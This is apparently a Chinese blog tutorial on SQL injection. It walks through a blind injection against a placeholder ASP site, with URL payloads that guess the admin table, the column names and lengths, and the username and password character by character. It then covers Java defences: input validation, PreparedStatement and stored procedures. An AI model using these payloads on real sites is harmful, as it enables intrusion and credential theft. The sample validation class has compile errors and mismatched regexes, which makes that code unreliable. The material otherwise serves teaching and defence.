`

web安全,SQL注入过程与防范

    博客分类:
  • Web
阅读更多

举例一个来自网上的典型sql注入的过程分析:    

  如: 打开:http://hostlocal/test2/list.asp?id=17在其后面加'为http://hostlocal/test2/list.asp?id=17'
出错!显示为:“数据库出错”。那么接下来我们便进行如下操作:

1 猜管理员帐号表。
2 猜相应表中的用户的字段名以及密码的字段名。
3 猜出用户名的长度和密码的长度
4 猜出用户和密码
5 找到管理页面进入管理

  猜管理员的表:                            

  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin)'//min(id)返回表中ID最小值

  返回文章证明,有一个admin的表;如果没有返回文章,证明出错不存在admin这个表。
    
  猜用户的字段名:

  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where user='aaa')返回错误信息,表示没有user这个用户段名
再来!~~~http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where username='aaa')
没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在username个字段,只是用户名不是aaa

  猜密码的字段名:

  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where passwd='aaa')返回错误信息表示没有passwd这个密码字段名。                        

  再来:http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where password=aaa')没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在password这个字段,只是密码不是aaa

  猜用户字段名长度:                          

  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)

  >5)                                                             

  正确
  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)<10)

  正确
  用户名长度大于5小于10
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)

=7)                                                              

  呵``` 用户名长度为7位

  猜密码长度:

  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(password)>5)
正确
  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(password)<10)
正确
密码长度也是大于5小于10
  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(password)=7)
呵``` 密码长度为7位

  猜用户名:

  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where mid(username,1,1)='a')

  用户名第一个字母是:a                                                          

  猜用户名第二位:http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where mid(username,2,1)='b')                                             

  以此类推!

  猜密码:                                                                       

  猜密码跟猜用户名一样!

  http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where mid(password,1,1)='a') 
  猜完后来到管理页面:
http://hostlocal/test2/admin.asp

  登录


接来来讲述如何防范基于java web开发平台的sql注入防范

一、编写数据验证类

parameterCheck.java  
   
public class parameterCheck{ 
     String emailregex="[’\\w_-]+(\\. [’\\w_-]+)*@[’\\w_-]+(\\.[’\\w_-]+)*\\.[a-zA-Z]{2,4}";
     String intregex="^(\\d{5}-\\d{4})| (\\d{5})$";
     Stirng zipregex="^-[0-9]+$|^[0-9] +$"; 

    public static Boolean isEmail(string emailString){ 
        return java.util.regex.Pattern.compile(emailregex).matcher(emailString).matches();

    } 
    public static boolean isInt(string intString){ 
         return java.util.regex.Pattern.compile(intregex).matcher(intString).matches();
    } 
    public static boolean isZip(string zipString){ 
         return java.util.regex.Pattern.compile(zipregex).matcher(zipString).matches();    } 
}

注:
三种regex 匹配方法 其中public boolean matches(String regex) 此方法调用的 str.matches(regex) 形式与第二种表达式产生完全相同的结果
如果要多次使用一种模式,第三种方法编译一次后重用此模式比每次都调用此方法效率更高。
1.public Boolean java.lang.String.matchs(String regex);

2.public Boolean java.util.regex.Pattern.matches(regex, input);

3.public Boolean java.util.regex.Pattern.compile(regex).matcher(input).matches()


二、始终使用预编译preparedStatement 代替 statement
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES
                                     SET SALARY = ? WHERE ID = ?");
   pstmt.setBigDecimal(1, 153833.00)
   pstmt.setInt(2, 110592)

预编译首先从名字上就知道提高了程序的执行性能,同时在代码上提高了可读性,最重要的是
在安全性上

三、 使用存储过程
存储过程是数据库端的,经过预编译的过程,在安全性上主要对是一些使用运算符(如 AND 或 OR)将命令附加到有效输入参数值的攻击。在应用程序受到攻击时,存储过程还可以隐藏业务规则的实现。


JDBC API 提供了一个存储过程 SQL 转义语法,该语法允许对所有 RDBMS 使用标准方式调用存储过程。
public interface CallableStatement extends PreparedStatement

无返回结果的过程语法:
    {call 过程名[(?, ?, ...)]}
  
返回结果参数的过程的语法为:
  
  {? = call 过程名[(?, ?, ...)]}
  
不带参数的已储存过程的语法类似:
  
  {call 过程名}

 

4
0
分享到:
评论

相关推荐

    web安全,sql注入

    Web安全是保障互联网应用及其数据安全的关键领域,而SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句来欺骗服务器,获取未经授权的数据或执行非法操作。以下将详细阐述SQL注入的基础知识及其防范措施...

    Web项目中的SQL注入问题研究与防范方法.pdf

    通过上述内容,可以得出结论:SQL注入攻击是当前Web项目面临的主要安全威胁之一,因此在Web项目的开发和维护过程中,设计者和开发者必须高度重视数据输入的合法性校验和安全防护措施。通过主动式防范模型,结合输入...

    web安全之sql注入

    ### Web安全之SQL注入 #### 一、理解SQL注入及其原理 SQL注入是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意SQL代码插入到查询中,以操纵数据库的行为或提取敏感信息。这种攻击之所以能够成功,主要是由于...

    基于Web的SQL注入漏洞扫描系统的设计研究

    对于现代SQL注入检测大部分都是将语法分析策略为基础,但是此种策略检测的效率较低,并且...实验表示,此防御措施Web应用系统能够对大部分SQL注入攻击进行防范,并且对于Web应用系统中的SQL注入点具有良好的识别效果。

    SQL注入攻击与防范措施.pdf

    本文针对SQL注入攻击及其防范措施展开了详细讨论,以下是对文档内容的知识点梳理: 1. SQL注入攻击的定义与原理 SQL注入攻击是一种常见的网络攻击技术,攻击者利用网站应用程序对用户输入数据的合法性判断不足,向...

    SQL注入攻击与防范研究

    ### SQL注入攻击与防范研究 #### 一、SQL注入攻击概述 SQL注入攻击是一种常见的网络安全威胁,主要通过向Web应用程序提交恶意SQL代码来实现。这种攻击利用了Web应用开发过程中未能充分验证用户输入数据的问题,...

    SQL注入攻击及其防范浅谈

    SQL注入攻击是网络安全领域中一个严重的问题,它发生在应用程序与数据库交互时,攻击者通过输入恶意的SQL代码,使得数据库执行非预期的操作,可能导致数据泄露、数据篡改甚至整个系统的瘫痪。这篇博客将深入探讨SQL...

    SQL注入攻击原理分析及JavaWeb环境下的防范措施.pdf

    本文在分析了SQL 注入原理的基础上,提出了几点Java Web 环境下防范措施。   随着Ineternet 技术的迅猛发展,为了能更充分地使用互联网这个世界上最大的交流平台,许多单位或个人纷纷建立自己的网站。但是...

    Web应用中SQL注入攻击与防范探析.pdf

    在互联网技术迅猛发展的当下,Web应用程序的安全问题日益凸显,其中SQL注入攻击已经成为一种普遍存在的安全隐患。SQL注入,即SQL Injection,是一种针对数据库进行的攻击技术,它利用Web应用程序对用户输入验证不足...

    基于高校Web应用中SQL注入攻击与防范研究.pdf

    根据提供的文件信息,我们...以上内容总结了文档中关于高校Web应用中SQL注入攻击与防范研究的核心知识点,涵盖了攻击原理、可能的危害以及防范措施等。这些知识点对于理解和提升Web应用的安全防护水平具有重要的价值。

    SQL注入攻击与防范技术

    SQL注入攻击是网络安全领域的一大威胁,它主要针对的是那些处理用户输入数据的Web应用程序。攻击者通过构造恶意的SQL代码,使系统误以为是合法的查询,从而获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...

    net中sql注入式攻击与防范秘籍

    ### .NET中SQL注入式攻击与防范秘籍 #### SQL注入概述 SQL注入是一种常见的网络安全攻击方式,攻击者通过在数据库查询中插入恶意SQL语句,以达到非法获取数据、篡改数据甚至控制整个数据库的目的。对于使用.NET...

    基于Web应用的SQL注入攻击与防范技术的研究.pdf

    本文主要探讨了基于Web应用的SQL注入攻击的产生原因、攻击过程、危害以及如何防范这些攻击,旨在提高网站数据信息的安全性。 ### SQL注入攻击产生原因 1. **应用程序自身存在漏洞**:Web应用程序开发时间紧迫和开发...

    SQL注入检测与防范方法研究.pdf

    "SQL注入检测与防范方法研究" SQL注入是一种常见的Web应用安全漏洞,攻击者可以通过在Web应用程序的输入字段中注入恶意的SQL代码,来获取或修改数据库中的敏感信息。SQL注入攻击可以对Web应用程序造成严重的安全...

    基于Web站点的SQL注入分析与防范.pdf

    基于Web站点的SQL注入分析与防范.pdf

    SQL注入分析与防范策略.pdf

    SQL注入分析与防范策略 SQL注入是一种常见的网络攻击方式,通过在Web应用程序中插入恶意的SQL代码,攻击者可以获取敏感信息、篡改数据、甚至控制整个系统。随着互联网的普及,SQL注入攻击的危害性也越来越大。 一...

    sql注入常识和防范

    #### 四、SQL注入防范措施 为了防止SQL注入攻击,开发人员应采取以下措施: - **输入验证**:确保所有外部输入都经过严格的验证,比如使用正则表达式检查输入是否符合预期格式。 - **参数化查询**:使用参数化查询...

    web测试之安全测试方法:sql注入方法

    了解并掌握SQL注入的各个方面,是保障Web应用安全的关键步骤。作为测试人员,我们应该在开发阶段就积极参与,进行详尽的安全测试,以预防此类问题的发生。同时,教育开发者养成良好的编程习惯,提高整体的安全意识,...

    SQL注入攻击及其防范技术研究.pdf

    6. Web应用防火墙(WAF):部署专业的Web应用防火墙可以识别并拦截SQL注入攻击尝试。 7. 安全编码:遵循安全编程的最佳实践,采用安全的编程语言和库,及时更新和打补丁,避免使用有明显安全漏洞的代码。 文章还提出...

    SQL注入攻击与防范

    SQL注入漏洞通常出现在Web应用程序与用户进行交互的过程中。当用户输入的数据未经适当清理或验证就被直接插入到SQL查询语句中时,就会产生SQL注入风险。这意味着任何需要从客户端获取数据来构建SQL语句的地方都可能...

Global site tag (gtag.js) - Google Analytics